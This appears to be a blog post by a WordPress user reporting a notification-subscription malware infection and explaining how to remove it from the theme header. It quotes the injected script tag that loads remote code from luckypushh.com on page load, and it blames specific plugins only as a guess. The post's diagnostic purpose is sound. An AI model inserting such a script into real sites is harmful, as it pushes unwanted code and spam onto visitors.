I was contacted by a friend who said that a Pop-up box started appearing , just like the one which asks for browser notification permission on examining the box it turned out to be malware pushing subscribes for a website Luckypushh . com
At time of writing of writing I couldn't pin point the exact Plugin which injected it , but as the last two updated apps where All In One SEO and Sucuri Defender so strongest chances are of these two plugins.
The following code was injected on the blog
<script src="//luckypushh.com/ntfc.php?p=xxx" data-cfasync="false" async=""></script>
A google search didn't show much about luckypushh.com just that the domain was registered on 30 March 2018. There are 125 indexed searches on google with the same injected code put a different parameter number.
Once clicking the "Allow" in fake notification subscriber, It opens up a pop-up box , which prompts an actual browser notifications for the website "Luckypushh.com"
How to Remove LuckyPussh Notification Subscribe Malware
Open your WordPress Dashboard and go to Appearance > Editor , select "header" file and remove the Script tags highlighted at Line 8
Any information on the actual culprit would be highly appreciated so that I may add to it and remove the bloody plugin for good
